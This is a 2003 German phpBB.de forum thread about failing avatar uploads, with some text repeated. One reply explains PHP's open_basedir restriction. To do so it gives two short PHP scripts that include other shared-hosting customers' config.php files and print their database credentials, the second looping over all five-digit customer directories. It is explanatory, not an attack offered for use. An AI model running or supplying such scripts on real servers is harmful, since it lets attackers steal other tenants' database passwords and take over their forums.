Avatare gehen nicht mehr hochzuladen...
Verfasst: 18.02.2003 21:33
phpBB.de
phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/
Avatare gehen nicht mehr hochzuladen...
Seite 1 von 1
Verfasst: 18.02.2003 21:36
Verfasst: 18.02.2003 21:44
bei manchen Hostern musst du einen extra Ordner anlegen aus dem die hochgeladenen Dateien dann auf deinen Webspace verschoben werden, hast du beim FTP löschen vielleicht auch diesen Ordner gelöscht ? (Wie der Ordner heißt und wo du ihn erstellen musst erfährst du von deinem Hoster)
Verfasst: 20.02.2003 19:22
Verfasst: 06.04.2003 12:08
ha, genau das gleiche ist bei mir auch !!!!!
genau der gleiche Vorgang.
und nun --> bis auf den upload der Avatare funzt alles bestens
keiner ne Ahnung ???
ed
genau der gleiche Vorgang.
und nun --> bis auf den upload der Avatare funzt alles bestens
keiner ne Ahnung ???
ed
Verfasst: 10.04.2003 11:40
open_basedir restriction ist ein Sicherheitstool für paranoide Administratoren. Theoretisch ist es ja möglich, mittels php Dateisystemfunktionen die komplette Festplatte auszulesen, oder z.B. Kennwörter auszuspähen. Beispiel: Ich bin auf einem Shared Server und meine Daten befinden sich im Verzeichnis
home/htdocs/12345/
Ein anderer Kunde auf demselben Rechner hat ein phpBB installiert, durch eine Fehlermeldung kann z.B. jederzeit das Verzeichnis festgestellt werden. Ich schreibe nun ein php script:
Oder was haltet ihr davon:
spioniert *alle* Kennwörter aller phpBB aller Kunden aus, die eine 5-stellige Kundennummer haben und ein phpBB2 im Hauptverzeichnis installiert haben. Ich kann also jederzeit vollen (Schreib-)Zugriff auf all diese Datenbanken erhalten und z.B. Anonymous zum Admin umschreiben.
Dort kommt nun die open_basedir restriction ins Spiel. Die verhindert, daß php auf jedwede Dateien ausserhalb des Pfades /home/htdocs/12345/ zugreifen kann. PHP lädt allerdings die Avatare ins Temporärverzeichnis des Rechners (wird in der php conf eingestellt). Versucht phpBB nun einen Zugriff auf /tmp/dateiname.gif wird der Befehl verweigert, siehe Fehlermeldungen.
Einzige Lösung: PHP muß so eingestellt werden, daß die Dateien in einem Unterverzeichnis des Webspace gespeichert werden, denn hier funktionieren alle Dateifunktionen ja einwandfrei. Das muß aber der Administrator eures ISP machen.
home/htdocs/12345/
Ein anderer Kunde auf demselben Rechner hat ein phpBB installiert, durch eine Fehlermeldung kann z.B. jederzeit das Verzeichnis festgestellt werden. Ich schreibe nun ein php script:
Code: Alles auswählen
<HTML><HEAD></HEAD><BODY>
<?php
include("/home/htdocs/54321/phpBB2/config.php");
echo $dbhost . "<BR>". $dbname . "<BR>" . $dbuser . "<BR>" . $dbpass;
?>
</BODY></HTML>
Code: Alles auswählen
<HTML><HEAD></HEAD><BODY>
<?php
for ($i=10000; $i < 100000; $i++) {
unset($dbhost);
include("/home/htdocs/" . $i . "/config.php");
if (isset($dbhost))
echo $i . ":" . $dbhost . "<BR>". $dbname . "<BR>" . $dbuser . "<BR>" . $dbpass;
?>
</BODY></HTML>
Dort kommt nun die open_basedir restriction ins Spiel. Die verhindert, daß php auf jedwede Dateien ausserhalb des Pfades /home/htdocs/12345/ zugreifen kann. PHP lädt allerdings die Avatare ins Temporärverzeichnis des Rechners (wird in der php conf eingestellt). Versucht phpBB nun einen Zugriff auf /tmp/dateiname.gif wird der Befehl verweigert, siehe Fehlermeldungen.
Einzige Lösung: PHP muß so eingestellt werden, daß die Dateien in einem Unterverzeichnis des Webspace gespeichert werden, denn hier funktionieren alle Dateifunktionen ja einwandfrei. Das muß aber der Administrator eures ISP machen.